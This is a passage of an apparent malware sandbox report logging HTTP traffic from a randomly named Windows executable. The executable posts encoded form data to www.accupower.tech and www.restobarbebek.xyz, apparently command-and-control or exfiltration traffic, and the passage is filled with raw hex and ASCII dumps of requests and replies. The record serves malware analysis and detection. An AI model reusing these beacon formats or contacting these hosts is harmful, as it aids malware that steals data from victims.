                                                                                      Data Ascii: 5FQxP${#I~q{x/1hPr4fyD~'HmA(H0&gnoU.=a[vaX6IE;xXvzW:88DM6)4(N_l8a~GNYh$@H%1g&vm7)+?D,#YXZ?@Uc{v/_f<%
                                                                                      Sep 30, 2024 10:43:55.487468004 CEST1236INData Raw: 2c 95 5f f7 40 36 01 d5 03 9d 23 c5 38 c0 31 60 c8 a2 b7 a9 c3 2c 80 c6 6a fc 9e ce eb 6b 4b 02 01 6d 1d ed 26 2a 9f 6d c0 a0 b4 91 42 cc 8a 8b 00 36 64 b3 36 c0 01 d1 59 c4 d5 e2 31 7e 79 8a 64 aa 06 b4 6f 41 53 44 b2 08 06 48 e2 3b 80 03 31 7c
                                                                                      Data Ascii: ,_@6#81`,jkKm&*mB6d6Y1~ydoASDH;1|QJ4ysby4>=g|*5Y$p'4\pm!k`_6ipG,}f:8P'HS@/W@7:0s1ttdZVVA1'ldqbd


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.658802217.160.0.158802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:43:57.514091015 CEST1806OUTPOST /ojw7/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Origin: http://www.accupower.tech
                                                                                      Referer: http://www.accupower.tech/ojw7/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 44 63 42 61 6c 34 64 5a 65 4c 69 68 64 7a 72 6b 6e 34 39 46 59 42 67 48 32 63 77 30 73 46 61 30 2b 4b 61 77 32 68 6e 50 34 50 41 46 6b 56 6a 4a 6e 4b 78 69 4c 46 61 48 53 6f 78 5a 53 49 5a 4a 4e 70 67 45 43 72 75 6e 75 45 32 49 71 65 79 31 46 4f 6d 76 6c 41 62 48 7a 34 5a 51 47 54 46 4a 56 59 6a 57 2b 35 6a 62 74 52 44 69 49 70 59 62 55 7a 71 50 37 44 46 34 52 6d 78 70 78 52 70 50 48 58 4d 6a 51 76 59 70 69 6e 50 72 50 66 2f 33 38 69 75 79 72 49 62 2b 49 59 49 79 58 38 46 5a 32 61 44 73 41 32 51 4c 6d 37 65 77 65 76 4c 59 67 68 4e 78 52 48 74 52 47 4b 42 79 52 35 5a 72 73 53 72 4d 76 75 72 75 6a 47 77 35 71 72 76 76 59 57 72 36 33 79 77 35 34 78 72 75 6c 43 64 6f 62 2f 74 57 78 39 42 68 63 6a 4d 4f 6f 73 6f 32 57 56 6d 38 6e 63 2f 47 57 6c 75 49 30 66 4f 6b 51 78 4a 73 71 65 61 70 47 4b 4c 41 61 70 45 74 64 2b 66 30 39 6f 78 46 56 74 77 65 56 72 4d 34 68 76 51 54 33 44 38 77 55 2b 4c 70 61 74 6b 75 64 2b 55 69 36 7a 35 41 4e 6a 35 77 70 79 71 72 46 77 4b 6a 58 65 6c 46 63 36 4c [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=DcBal4dZeLihdzrkn49FYBgH2cw0sFa0+Kaw2hnP4PAFkVjJnKxiLFaHSoxZSIZJNpgECrunuE2Iqey1FOmvlAbHz4ZQGTFJVYjW+5jbtRDiIpYbUzqP7DF4RmxpxRpPHXMjQvYpinPrPf/38iuyrIb+IYIyX8FZ2aDsA2QLm7ewevLYghNxRHtRGKByR5ZrsSrMvurujGw5qrvvYWr63yw54xrulCdob/tWx9BhcjMOoso2WVm8nc/GWluI0fOkQxJsqeapGKLAapEtd+f09oxFVtweVrM4hvQT3D8wU+Lpatkud+Ui6z5ANj5wpyqrFwKjXelFc6LVFVbH2jEB0DSCnLT7rFL2BwVS1/dDBVPTm4c7hC5DWf4XEMOIkVADdGy9XXE20WnEUNEawFm95Nmo+4Sw2Ifg9vXRGmpiQxv+rYDOVB+m+4JaDCT3r+zDx/SbsBkClP44hmqn9eLtr1JQOLR3ng7CH6giBE0OiFqlqcLw3ZilWIYCPHZSJsliyqhmUA1toOv08lo6dmQ7/BdchJmAD5p35+bPO6s/+Gp1b4Tx2W2DkKJr2+Pq42xfaJ3B1aPlWkt/eSWx/Pwn1pW7vrnfbo1TmfkpVEB6VaLviPhVvsesuMpA1mOKeS7t9P2yfXUHFoRvPv2kqYSRj1kY+HHz1wXlKaf2rn7rMauD6LEMJHUUQnz7CsS/qqPJSXLZVAgMhysXS4WA9zYcMnNov0x5guPM8v0IlMQZHq+aekuaF6oKMopvrfW1IISmOjgestL/2KLPf3FQyoj3axdhpLQrEdW6bHl4J1zMf+IpJjcxPyk4kYsRt4A56wrNDgpNLRw7h9bYgGi2+fgmYuiPjoHm/K7uq9XXMJmskquPaQikSWGCrIVDJu3CESrVnQdG8KJO8hJQf3wpDSViipr+Zhj26ol1zbT4S7gYxSlktb8fAp07x9nn8ZkxGYlOqkrVrLalxXWNyaT6Z7LASGBOiWK8WRFBWzPuMvDujA8pd [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:58.163693905 CEST1236INHTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:43:58 GMT
                                                                                      Server: Apache
                                                                                      Content-Encoding: gzip
                                                                                      Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED]
                                                                                      Data Ascii: 300aH.>nB*ok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,*h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0*IV@>y&_i|f{i3>x`8[!S~,>~3EG;p>3]\*\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk|FBO`_|/(^ZG?X4xUYZ/)]-[)aT*eI1z&_zzV}?O|<b|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi*@S~{y^fuzo [TRUNCATED]
                                                                                      Sep 30, 2024 10:43:58.163750887 CEST1236INData Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc
                                                                                      Data Ascii: ylmF[?YEe^=4ec|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J}*;bo*O)H{`Sw
                                                                                      Sep 30, 2024 10:43:58.163786888 CEST1236INData Raw: ee a0 57 0f e6 4e 72 4a 32 72 fc e1 6a 62 ee 85 93 8e 38 27 f3 ea 89 9b 36 8e 4b 64 70 5d cf 2e cf 96 e3 74 1a d4 77 b9 6c 0a c1 5d 1e 2e 78 56 60 ca 80 61 1e d3 74 52 83 8e e3 0e 44 e5 5f 98 e9 71 27 75 e7 ec 1f 8f e8 7a 40 43 5b 4a 89 66 2f 0a
                                                                                      Data Ascii: WNrJ2rjb8'6Kdp].twl].xV`atRD_q'uz@C[Jf/1~MrvP88aQ?b4Ho4>xzFQ#GwNN$#/]zrZ{&,H0Jv.H%d0gk1JHtv69-OaG35l
                                                                                      Sep 30, 2024 10:43:58.163820982 CEST672INData Raw: 43 4a b4 9f c6 89 0a f4 96 2e d5 02 a1 fa 7a 74 eb 85 e6 d7 71 a8 b0 ce 0f dc 41 b5 9d c3 38 4d 63 85 61 b1 75 ae 9d 34 ac 47 c6 9a 16 88 32 66 57 61 a7 1a 53 60 03 11 79 27 76 f9 6e 08 ad 14 85 02 5a df ce 7c 6b a9 23 e5 ed ed 3e 69 38 7e 66 af
                                                                                      Data Ascii: CJ.ztqA8Mcau4G2fWaS`y'vnZ|k#>i8~f~+aZ>t#HXm.AH:9ofvt+Zk0l&jfA,CYN'HB,q/.m%lXx)0bsr!"s)LXV#Id0\G0r
                                                                                      Sep 30, 2024 10:43:58.163856030 CEST1236INData Raw: 19 b3 49 83 8b 79 29 10 e1 bc f5 90 8b 5f 1f 48 e7 cd a7 c9 32 34 77 bc 56 54 e4 83 c3 0f e9 f3 ad d7 95 90 67 f3 15 a1 60 61 87 f0 21 6b 8d 2a 8e b2 85 ed 4b 64 ac dc 94 89 4e 68 17 ec b5 2a ac 49 19 e3 7a f1 75 1f 10 5a 43 1f 85 a9 e9 4f a8 bc
                                                                                      Data Ascii: Iy)_H24wVTg`a!k*KdNh*IzuZCOc(%@t: bA_q49TP7xBku(MCUuP~:LNO!n$@duA7tDde1Bk|v4yrfgtvyrAsI>fY
                                                                                      Sep 30, 2024 10:43:58.163892031 CEST1236INData Raw: 98 ec 22 26 14 28 b3 84 c2 c0 5e 8a 73 e1 63 d7 f2 72 4e 95 e7 f1 c0 fb 38 f8 cc 3f 27 e5 81 e6 32 7f 59 2f 7c 40 4a f9 09 55 8c 00 97 b3 25 91 73 6e 55 8e cc 22 3f 98 55 de 90 55 35 1a 44 e1 9b 45 3e 72 c9 e5 eb 6f 4e 24 9a 78 2d dc bc 7d e8 27
                                                                                      Data Ascii: "&(^scrN8?'2Y/|@JU%snU"?UU5DE>roN$x-}'[{JE}Q3f`*vs7*Hi6il=H?*JT%C9asrw]u91%<M#gcN:{y|3KydfA,k?\a/U"G
                                                                                      Sep 30, 2024 10:43:58.163927078 CEST1236INData Raw: a1 19 1f 14 11 ab 49 87 2e db 23 34 36 c7 79 8e e1 1d 3f 30 b5 50 55 28 03 10 e9 65 e0 16 e3 e4 ce 83 13 78 1d cd 6d 4b 8d 56 89 09 03 97 84 dc 2f 2a 5d 3b fd ed ee a2 a4 ac d4 dc 5e 17 47 b5 80 73 62 6d 22 80 c1 6c e3 55 b9 33 8c 70 6c 2c 83 d1
                                                                                      Data Ascii: I.#46y?0PU(exmKV/*];^Gsbm"lU3pl,ghcp-n!>Dq[~,O^QwdZ.|Bt*ENMxutb<*Y[<$L,z?q;@2GPHFmJ^qfZWV-S^
                                                                                      Sep 30, 2024 10:43:58.163984060 CEST672INData Raw: e1 aa 83 35 db 17 d7 24 49 fe f2 1f 3a af f8 3f 9d d7 7f 3a af ff 74 5e ff b3 ce eb 05 d1 f3 c3 19 44 23 f9 97 b3 79 cf df 9c d7 a3 c2 5f f9 7b 61 9e e5 e2 75 ff 84 de 8d e7 f2 8f 39 af df e4 01 97 fa ef c8 fb 2f 3a af f7 5c 17 e4 93 c9 cb c8 09
                                                                                      Data Ascii: 5$I:?:t^D#y_{au9/:\8gr,a$_]6e9*xs^+Y2C`L)UGL ''H;R>XFGip`qp"|4g{ke_cvXe=j$>{@mHvr1B
                                                                                      Sep 30, 2024 10:43:58.164017916 CEST1236INData Raw: 46 a8 52 05 5b 5a b8 20 0c 8f cf 06 80 1a 5b 8c ad f0 7d 23 8b b9 ce 54 00 39 f8 de 34 f5 f0 e3 78 f5 c9 b8 03 23 0c b1 36 be c0 7a 1f 50 59 70 09 8b 71 9e 60 d8 7a 86 99 59 dc 57 4f 7d 7a bc e0 3d a2 28 98 31 8b 45 0e fc 59 d7 ce b8 ff dc 7d d8
                                                                                      Data Ascii: FR[Z [}#T94x#6zPYpq`zYWO}z=(1EY}{O[?V!C\yqzMThm, qk&+?@y@wm]3|Sqd$!.~ hGZuJyC -kIR'gr#7XXBN"l8
                                                                                      Sep 30, 2024 10:43:58.164072037 CEST1236INData Raw: f1 aa 66 de 63 e9 62 00 d3 90 70 2c 4c 79 01 6b c4 f4 68 90 0b 4d f5 77 21 05 21 b9 c4 d9 fd a4 9e 5a b6 81 39 9c b6 6d 9a 84 01 77 06 d9 6f 31 e7 d1 34 fb 38 b0 d2 f6 88 b8 0b 5c 40 2c 5c 8a fb 42 b1 37 92 3e bf 00 8e 8d 7d 2e be 8a 41 fb 7a 5e
                                                                                      Data Ascii: fcbp,LykhMw!!Z9mwo148\@,\B7>}.Az^Y.?>SM#!G;p\z-{"S"A~UC:I]CgK!q{H9}oRa]l<?0x,mYz7c/HM.vr.(pw5x*q
                                                                                      Sep 30, 2024 10:43:58.169665098 CEST1236INData Raw: fd 48 0b 5c 0f 66 18 65 28 67 7a 02 54 59 51 91 f1 1a c3 e1 0b 3f 06 44 ae d2 d3 08 dc 69 b0 ed a9 36 7a 86 88 11 33 89 4e 58 54 74 99 25 e1 11 37 b9 0e 01 ed 5b cb dd 8d b6 5e d3 82 40 1f c7 99 29 44 bb 8e a7 73 09 97 53 1e 45 0c 33 4a 5a d8 bc
                                                                                      Data Ascii: H\fe(gzTYQ?Di6z3NXTt%7[^@)DsSE3JZ{re4dJ](2{<Rv!qa'XWWh(6YYhP4"p4ui'o8498js`%Dh'O?q18ogQy0~A


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.658803217.160.0.158802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:00.047077894 CEST506OUTGET /ojw7/?9jtPKX=Oep6mOdcbJS8M33gn6lJDCgdhZprpWT1xYap2DCm99RWzR/+rod5DkimcY1te6tRP4YAPOidnC7q9fyBbp+p4w7BxYlfBAVSQr378a/zqULvDaURYind12ZcUgt4zzVfKlFhbII=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.accupower.tech
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:44:00.690763950 CEST1236INHTTP/1.1 200 OK
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 33643
                                                                                      Connection: close
                                                                                      Date: Mon, 30 Sep 2024 08:44:00 GMT
                                                                                      Server: Apache
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 61 63 63 75 70 6f 77 65 72 2e 74 65 63 68 20 2d 20 6c 65 69 73 74 75 6e 67 73 66 26 23 32 32 38 3b 68 69 67 65 20 42 61 74 74 65 72 69 65 73 79 73 74 65 6d 65 20 2d 20 69 6e 66 6f 40 61 63 63 75 70 6f 77 65 72 2e 74 65 63 68 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 32 30 31 32 2d 30 32 2d 30 37 54 31 32 3a 33 37 20 55 54 43 20 2d 20 68 74 74 70 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 61 72 74 69 63 6c 65 2c 61 73 69 64 65 2c 64 65 74 61 69 6c 73 2c 66 69 67 63 61 70 74 69 6f 6e 2c [TRUNCATED]
                                                                                      Data Ascii: <html> <head> <title>accupower.tech - leistungsf&#228;hige Batteriesysteme - info@accupower.tech</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <style> /*! normalize.css 2012-02-07T12:37 UTC - http://github.com/necolas/normalize.css */article,aside,details,figcaption,figure,footer,header,hgroup,nav,section,summary{display:block}audio,canvas,video{display:inline-block;*display:inline;*zoom:1}audio:not([controls]){display:none}[hidden]{display:none}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}html,button,input,select,textarea{font-family:sans-serif}body{margin:0}a:focus{outline:thin dotted}a:hover,a:active{outline:0}h1{font-size:2em;margin:.67em 0}h2{font-size:1.5em;margin:.83em 0}h3{font-size:1.17em;margin:1em 0}h4{font-size:1em;margin:1.33em 0}h5{font-size:.83em;margin:1.67em 0}h6{font-size:.75em;margin:2.33em 0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:bold}blockquote{margin:1em 40 [TRUNCATED]
                                                                                      Sep 30, 2024 10:44:00.690785885 CEST1236INData Raw: 6b 62 64 2c 73 61 6d 70 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 73 65 72 69 66 3b 5f 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 63 6f 75 72 69 65 72 20 6e 65 77 27 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a
                                                                                      Data Ascii: kbd,samp{font-family:monospace,serif;_font-family:'courier new',monospace;font-size:1em}pre{white-space:pre;white-space:pre-wrap;word-wrap:break-word}q{quotes:none}q:before,q:after{content:'';content:none}small{font-size:75%}sub,sup{font-size:
                                                                                      Sep 30, 2024 10:44:00.690799952 CEST1236INData Raw: 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 7d 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 65 61 72 63 68 2d 64 65 63 6f 72 61 74 69 6f 6e 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a
                                                                                      Data Ascii: :content-box}input[type="search"]::-webkit-search-decoration,input[type="search"]::-webkit-search-cancel-button{-webkit-appearance:none}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}textarea{overflow:auto;vertical-align:t
                                                                                      Sep 30, 2024 10:44:00.690983057 CEST1236INData Raw: 20 20 20 20 20 35 70 78 20 35 70 78 20 31 30 70 78 20 30 70 78 20 72 67 62 61 28 35 30 2c 20 35 30 2c 20 35 30 2c 20 30 2e 32 35 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20
                                                                                      Data Ascii: 5px 5px 10px 0px rgba(50, 50, 50, 0.25); } h1 { margin:0; padding:0; line-height: 52px; margin-bottom:5px!important; size:60px;
                                                                                      Sep 30, 2024 10:44:00.690999031 CEST1236INData Raw: 75 45 4f 63 71 41 41 42 34 6d 62 49 38 75 53 51 35 52 59 46 62 43 43 31 78 42 31 64 58 4c 68 34 6f 7a 6b 6b 58 4b 78 51 32 59 51 4a 68 6d 6b 41 75 77 6e 6d 5a 47 54 4b 42 4e 41 2f 67 38 38 77 41 41 4b 43 52 46 52 48 67 67 2f 50 39 65 4d 34 4f 72
                                                                                      Data Ascii: uEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhG
                                                                                      Sep 30, 2024 10:44:00.691009998 CEST1236INData Raw: 72 71 70 61 58 6c 6c 69 72 53 4b 74 52 71 30 66 72 76 54 61 75 37 61 65 64 70 72 31 46 75 31 6e 37 67 51 35 42 78 30 6f 6e 58 43 64 48 5a 34 2f 4f 42 5a 33 6e 55 39 6c 54 33 61 63 4b 70 78 5a 4e 50 54 72 31 72 69 36 71 61 36 55 62 6f 62 74 45 64
                                                                                      Data Ascii: rqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1z
                                                                                      Sep 30, 2024 10:44:00.691020966 CEST776INData Raw: 57 74 4f 33 31 39 6b 58 62 4c 35 66 4e 4b 4e 75 37 67 37 5a 44 75 61 4f 2f 50 4c 69 38 5a 61 66 4a 7a 73 30 37 50 31 53 6b 56 50 52 55 2b 6c 51 32 37 74 4c 64 74 57 48 58 2b 47 37 52 37 68 74 37 76 50 59 30 37 4e 58 62 57 37 7a 33 2f 54 37 4a 76
                                                                                      Data Ascii: WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9
                                                                                      Sep 30, 2024 10:44:00.691032887 CEST1236INData Raw: 48 2b 39 4e 78 69 58 75 7a 36 58 4c 73 62 65 5a 48 6c 70 62 2b 4e 4c 30 33 65 30 6b 52 6b 5a 6f 73 77 30 7a 31 64 33 6d 7a 51 30 78 31 7a 4a 49 54 79 4e 62 6d 47 72 6e 4a 73 56 41 4e 4e 5a 6d 4e 61 64 57 4e 56 32 4b 33 32 31 37 4d 39 33 52 69 6d
                                                                                      Data Ascii: H+9NxiXuz6XLsbeZHlpb+NL03e0kRkZosw0z1d3mzQ0x1zJITyNbmGrnJsVANNZmNadWNV2K3217M93RimfxvutpryP2tFfLdGmJ7L55R9ZK8uVnVmyJmlCbj9QoNb6NXXSlJWufpBHmO1OmjjhsXsefIq6TNO+brTFG3lOQam5Ip/diQ7LmMLWdpq1lKM5bPI4binSTEvkri6DfcFdHpWpiSZHH2/tKMUJKwIyzssNEblyRGs0
                                                                                      Sep 30, 2024 10:44:00.691042900 CEST1236INData Raw: 52 30 63 44 6f 76 4c 32 35 7a 4c 6d 46 6b 62 32 4a 6c 4c 6d 4e 76 62 53 39 34 59 58 41 76 4d 53 34 77 4c 32 31 74 4c 79 49 67 65 47 31 73 62 6e 4d 36 63 33 52 53 5a 57 59 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a
                                                                                      Data Ascii: R0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL21tLyIgeG1sbnM6c3RSZWY9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9zVHlwZS9SZXNvdXJjZVJlZiMiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIDIwMTQgKFdpbmRvd3MpIiB4bXBNTTpJbnN0YW5jZUlEPSJ4bXAuaWlkOkYzMzYwQTYwNDQwO
                                                                                      Sep 30, 2024 10:44:00.691054106 CEST1236INData Raw: 6a 6d 50 73 73 56 33 51 66 63 32 76 46 50 2f 32 50 78 48 4f 63 54 4a 36 77 38 2b 4e 36 7a 2f 41 69 5a 6c 70 6b 70 62 6c 61 47 38 61 4e 4c 77 4f 39 56 66 36 62 78 75 2f 71 46 75 53 39 79 65 38 73 4f 44 75 62 37 61 6e 35 54 7a 58 4d 7a 36 73 48 41
                                                                                      Data Ascii: jmPssV3Qfc2vFP/2PxHOcTJ6w8+N6z/AiZlpkpblaG8aNLwO9Vf6bxu/qFuS9ye8sODub7an5TzXMz6sHAkFUsG3ej4KzXA6diYABl9i4cJPTJTe9PzjcnfYPorGdbl8ZvZRHPK48+yCf06N1smsw9V9tLANrMcMlhEATC8P4PzU2SirCgosn9uLmZprURIfvt9tFz1RX+fUbyZ4Nqdvd97f2XNosyATtNcD6QrKdk9aPPfFw6x
                                                                                      Sep 30, 2024 10:44:00.697861910 CEST1236INData Raw: 42 6d 49 65 42 75 76 4c 44 56 65 62 66 4f 4f 34 41 64 74 34 74 69 54 38 7a 5a 4e 6a 47 36 63 4c 32 56 71 2f 31 38 2f 77 74 2f 6c 36 39 78 72 66 31 74 72 57 42 2f 79 35 61 33 75 68 6a 2f 33 71 50 6c 2b 52 62 31 43 64 59 45 39 74 37 42 65 67 53 65
                                                                                      Data Ascii: BmIeBuvLDVebfOO4Adt4tiT8zZNjG6cL2Vq/18/wt/l69xrf1trWB/y5a3uhj/3qPl+Rb1CdYE9t7BegSeEWM/nCGHqDdu1ieGu/a0fqjtTvTOIUvK/Cbd+nE9o7/fp2rPLeA8Rx6uCw3l2VTWy6PNM75iJAfPfKfpqfA9ZTV8y0PY1J8n+o+LXunN2UEPR+ppTDxvO5Z0ww4q7v2GVjxlIiWD7DCeh3PsxFfG4jq+GFMX0sa3V


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.65880485.159.66.93802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:44:05.945419073 CEST778OUTPOST /ym4w/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.restobarbebek.xyz
                                                                                      Origin: http://www.restobarbebek.xyz
                                                                                      Referer: http://www.restobarbebek.xyz/ym4w/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 47 51 65 39 51 54 36 4d 37 2b 4e 74 67 43 31 32 45 6e 71 6c 4d 49 4c 6b 34 6f 2b 43 65 31 6f 7a 70 41 43 34 65 76 41 4b 37 69 67 45 48 74 33 32 64 30 42 4f 48 4c 76 36 33 53 36 73 4b 6f 6b 54 76 79 4e 35 59 35 7a 4a 41 38 4c 74 31 73 6e 34 4f 55 4e 4c 67 45 61 2f 65 69 33 33 74 74 67 45 6e 62 70 4d 4c 73 45 44 30 36 6b 32 4a 7a 48 79 49 75 4d 63 30 54 77 4a 34 66 33 66 63 75 67 35 30 2b 52 46 4c 4a 71 6a 6d 52 31 6d 39 6c 66 79 41 4a 55 73 59 6a 42 44 51 45 53 2f 79 37 38 45 2b 72 70 69 59 48 75 38 31 6d 36 4e 4d 6b 75 2f 30 54 4c 42 33 77 54 72 46 43 4d 44 30 50 5a 31 68 59 56 66 47 62 37 47 4f 62 38 39
